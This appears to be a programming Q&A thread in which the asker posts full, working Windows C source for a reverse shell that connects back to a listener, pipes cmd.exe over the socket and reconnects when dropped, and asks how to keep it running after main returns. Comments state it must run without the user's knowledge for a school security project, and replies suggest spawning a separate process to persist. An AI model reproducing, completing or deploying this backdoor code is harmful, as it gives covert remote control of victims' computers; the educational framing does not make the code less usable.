How to Keep a Thread Alive After Main Function Ends in C on Windows?
Question:
I'm working on a C project for Windows where I need to create a thread that runs independently of the main function. The goal is to ensure that this thread remains active even after the main function has completed.
Here is the core part of my code:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#include <windows.h>

#pragma comment(lib, "ws2_32.lib")

void start_shell_process(SOCKET sockfd);

DWORD WINAPI connect_back(LPVOID lpParam) {
    WSADATA wsa;
    SOCKET sockfd;
    struct sockaddr_in servaddr;

    // Initialize Winsock
    if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0) {
        printf("Failed to initialize Winsock. Error Code: %d\n", WSAGetLastError());
        return 1;
    }

    // Initialize socket
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd == INVALID_SOCKET) {
        printf("Socket creation failed. Error Code: %d\n", WSAGetLastError());
        WSACleanup();
        return 1;
    }

    // Set up server address
    servaddr.sin_family = AF_INET;
    servaddr.sin_addr.s_addr = inet_addr("127.0.0.1"); // Use localhost for testing
    servaddr.sin_port = htons(4444); // Port should match the attacker's listening port

    // Connect to the server
    while (connect(sockfd, (struct sockaddr*)&servaddr, sizeof(servaddr)) != 0) {
        printf("Connection with the server failed. Retrying... Error Code: %d\n", WSAGetLastError());
        Sleep(5000); // Retry after 5 seconds
    }

    printf("Connection established with the server.\n");
    // Start the initial shell process
    start_shell_process(sockfd);

    closesocket(sockfd);
    WSACleanup();
    return 0;
}

void start_shell_process(SOCKET sockfd) {
    // Create a pipe for the child process's STDOUT.
    HANDLE g_hChildStd_OUT_Rd = NULL;
    HANDLE g_hChildStd_OUT_Wr = NULL;
    SECURITY_ATTRIBUTES saAttr;
    saAttr.nLength = sizeof(SECURITY_ATTRIBUTES);
    saAttr.bInheritHandle = TRUE;
    saAttr.lpSecurityDescriptor = NULL;
    if (!CreatePipe(&g_hChildStd_OUT_Rd, &g_hChildStd_OUT_Wr, &saAttr, 0)) {
        printf("Stdout pipe creation failed.\n");
        return;
    }
    if (!SetHandleInformation(g_hChildStd_OUT_Rd, HANDLE_FLAG_INHERIT, 0)) {
        printf("Stdout pipe SetHandleInformation failed.\n");
        return;
    }

    // Create a pipe for the child process's STDIN.
    HANDLE g_hChildStd_IN_Rd = NULL;
    HANDLE g_hChildStd_IN_Wr = NULL;
    if (!CreatePipe(&g_hChildStd_IN_Rd, &g_hChildStd_IN_Wr, &saAttr, 0)) {
        printf("Stdin pipe creation failed.\n");
        return;
    }
    if (!SetHandleInformation(g_hChildStd_IN_Wr, HANDLE_FLAG_INHERIT, 0)) {
        printf("Stdin pipe SetHandleInformation failed.\n");
        return;
    }

    // Create the child process.
    PROCESS_INFORMATION piProcInfo;
    STARTUPINFO siStartInfo;
    ZeroMemory(&piProcInfo, sizeof(PROCESS_INFORMATION));
    ZeroMemory(&siStartInfo, sizeof(STARTUPINFO));
    siStartInfo.cb = sizeof(STARTUPINFO);
    siStartInfo.hStdError = g_hChildStd_OUT_Wr;
    siStartInfo.hStdOutput = g_hChildStd_OUT_Wr;
    siStartInfo.hStdInput = g_hChildStd_IN_Rd;
    siStartInfo.dwFlags |= STARTF_USESTDHANDLES;

    // Create the shell process
    if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &siStartInfo, &piProcInfo)) {
        printf("CreateProcess failed. Error Code: %d\n", GetLastError());
        return;
    }

    // Close handles to the stdin and stdout pipes no longer needed by the parent process.
    // If they are not explicitly closed, there is no way to recognize that the child process has ended.
    CloseHandle(g_hChildStd_OUT_Wr);
    CloseHandle(g_hChildStd_IN_Rd);

    char buffer[1024];
    DWORD bytesRead, bytesAvailable, bytesWritten;

    // Clear the initial output from the shell process
    while (1) {
        if (!PeekNamedPipe(g_hChildStd_OUT_Rd, NULL, 0, NULL, &bytesAvailable, NULL) || bytesAvailable == 0) {
            Sleep(50); // Briefly wait for data to become available
            continue;
        }

        if (!ReadFile(g_hChildStd_OUT_Rd, buffer, sizeof(buffer) - 1, &bytesRead, NULL) || bytesRead == 0)
            break;
        buffer[bytesRead] = '\0';
        if (bytesRead < sizeof(buffer) - 1)
            break;
    }

    while (1) {
        // Receive command from attacker
        int bytes_received = recv(sockfd, buffer, sizeof(buffer) - 1, 0);
        if (bytes_received <= 0) {
            printf("Connection closed by attacker. Retrying...\n");
            Sleep(5000); // Retry after 5 seconds
            connect_back(NULL); // Reconnect
            return;
        }

        buffer[bytes_received] = '\0';

        // Strip trailing newline and carriage return characters
        buffer[strcspn(buffer, "\r\n")] = '\0';

        // Check for the special command to start a new shell process
        if (strcmp(buffer, "new") == 0) {
            // Send a message back to the attacker
            const char* new_shell_msg = "new shell initiated\n";
            send(sockfd, new_shell_msg, strlen(new_shell_msg), 0);

            // Clean up the current shell process before starting a new one
            TerminateProcess(piProcInfo.hProcess, 0);
            CloseHandle(piProcInfo.hProcess);
            CloseHandle(piProcInfo.hThread);

            // Send end of output indicator before starting new shell
            const char* end_marker = "[END_OF_OUTPUT]";
            send(sockfd, end_marker, strlen(end_marker), 0);

            start_shell_process(sockfd);
            return;
        }

        // Write command to child's STDIN
        WriteFile(g_hChildStd_IN_Wr, buffer, bytes_received, &bytesWritten, NULL);
        WriteFile(g_hChildStd_IN_Wr, "\n", 1, &bytesWritten, NULL);

        // Read from child's STDOUT
        while (1) {
            if (!PeekNamedPipe(g_hChildStd_OUT_Rd, NULL, 0, NULL, &bytesAvailable, NULL) || bytesAvailable == 0) {
                Sleep(50); // Briefly wait for data to become available
                continue;
            }

            if (!ReadFile(g_hChildStd_OUT_Rd, buffer, sizeof(buffer) - 1, &bytesRead, NULL) || bytesRead == 0)
                break;
            buffer[bytesRead] = '\0';
            send(sockfd, buffer, bytesRead, 0);
            if (bytesRead < sizeof(buffer) - 1)
                break;
        }

        // Send end of output indicator
        const char* end_marker = "[END_OF_OUTPUT]";
        send(sockfd, end_marker, strlen(end_marker), 0);
    }

    // Clean up
    CloseHandle(piProcInfo.hProcess);
    CloseHandle(piProcInfo.hThread);
    CloseHandle(g_hChildStd_OUT_Rd);
    CloseHandle(g_hChildStd_IN_Wr);
}

int main() {
    // Create a new thread for the connect_back function
    HANDLE thread = CreateThread(NULL, 0, connect_back, NULL, 0, NULL);
    if (thread) {
        // Detach the thread to ensure it runs independently
        CloseHandle(thread);
    } else {
        printf("Failed to create thread.\n");
    }

    // Main program ends here, but the thread continues to run
    return 0;
}


**
What I Have Tried**
Created a Thread: I used CreateThread to start the connect_back function in a separate thread.
Detached the Thread: Used CloseHandle on the thread handle to detach it.
Problem
The thread seems to exit as soon as the main function ends. I need the thread to keep running independently of the main function's lifecycle.
and i checked the answers to similar questions but the solution was pthread_exit() and it is not directly applicable in a Windows environment since Windows uses its own threading model (WinAPI).
**
Question**
How can I ensure the connect_back thread remains active even after the main function exits? Is there a way to achieve this in a Windows environment?
Any help or guidance would be greatly appreciated!

You have to detach the thread, so it doesn't have to be joined. And instead of exiting the process (which is what happens when the main function returns) you have to exit the current "main" thread.

WaitForSingleObject(thread,...);  then CloseHandle(thread) in main() will make main wait for the thread to finish.

Why does your main function do nothing else except create a thread that calls connect_back? What's the point of creating the thread? Why don't you simply call connect_back from main?

@SolomonSlow i am just testing this part of keeping the thread alive when the main ends . i need it in my shool project where the program is compromised to make the reverse shell attack for a school project in a security module . this is not the final code ^-^

OK, but if the main thread runs out of things to do while other threads are doing X and Y and Z, then why can't you re-arrange things such that the main thread does X or Y or Z, and let one of the other threads run out of things to do?

@anonime tina calling the function directly in the main would block becuase it maintains a tcp connection infinitly until the attacker exits so the original program would never execute if we call it at first or never ends if we call it at the end . thanks anyway <3

@SolomonSlow the code should be executed without the user being aware ( i know this is unethical but it is a project and it should be realistic ) so the main should exit when the user finishes but should leave the connection on .

@madeline I suggest that you take a look at the alternative that I mentioned in my answer.

AFAIK, Ted"s suggestion of creating a new process is the only option available.  Windows threads must belong to a process and the 'normal' crt will terminate the process whose initial loader-created thread called main() and any other threads created during the process run.

OK, You have an XY Problem. You don't need a C program that continues to run after main has returned. You need a console application that continues to run "in the background" after the command shell thinks the application has terminated. You should change the title of your question accordingly. The traditional way (maybe the only way?) to solve the problem on Linux is what Ted Lyngmo said: Have it spawn a child process that does the actual work while the original process terminates,* but I don't know what would work for Windows.

*If you actually try this on Linux, you may have to do some other, tricky stuff having to do with "process groups" and "controlling terminal." https://www.linusakesson.net/programming/tty/index.php

@SolomonSlow Many *nixes have daemon() to do that. Unfortunately, the GNU version doesn't do it properly. Here's an idea (not very well tested): the idea

From the C17 draft:
5.1.2.2.3 Program termination


If the return type of the main function is a type compatible with int, a return from the initial call to the main function is equivalent to calling the exit function with the value returned by the main function as its argument;


7.22.4.4 The exit function


Next, all open streams with unwritten buffered data are flushed, all open streams are closed, and all files created by the tmpfile function are removed.
Finally, control is returned to the host environment.


In a hosted environment, such as Windows or Linux, the operating system will, when the control is returned to it, reclaim all memory allocated by your program, including the program itself. The actual program code and all the memory for the variables will be gone and your approach can therefore not work in such an environment.
In a freestanding environment it may be possible to have threads live after the return from main.
I recommend rethinking this design. Creating a separate process instead of a thread may be one option.

Yeah, I suspect that is the only option:)
